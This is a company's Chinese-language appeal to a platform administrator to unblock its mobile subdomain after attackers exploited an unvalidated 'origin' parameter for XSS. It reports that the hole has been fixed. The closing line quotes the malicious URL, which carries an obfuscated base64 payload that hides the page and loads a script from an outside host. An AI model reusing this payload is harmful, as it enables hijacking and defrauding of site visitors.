管理员：

您好，我们公司官网的域名因为跟踪参数origin没校验被人用XSS漏洞恶意攻击。

现域名cifnews域名底下二级域名m.cifnew.com的被封。公司已连夜修复完漏洞。

公司是中国跨境电商领域的流量入口，在全球10多亿个网站中的排名为4000多名。现在处于疫情的紧急情况下，公司开展了跨境行业的战疫情，助力疫情等主题和活动， 而微信是公司一个重要的用户链接口，对公司影响非常大，希望能尽快解封，对应微信上的申请恢复访问的请求也已提交。

谢谢。

导致被封的链接如下：

https://m.cifnews.com/form/3659?origin=lunbo1234abce"})}}});new Function(atob(`ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LmhpZGRlbj0xO3Y9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7di5zcmM9Ii8vejIuZHVveGouY29tL3giO2RvY3VtZW50LmhlYWQuYXBwZW5kQ2hpbGQodik7dGhyb3cgMA==`))();new Vue({methods:{handle(d){axios.post("",{origin:"&ek=U2FsdGVkX1+lN7WjyoGFXMwqYyg/q2xC+SmfD3PpogN6SVO4YaIiVJtgtqdzjsG9B+Sd8Qi/Kt1xZzE/k5kdgw==&money=17785#1581427059155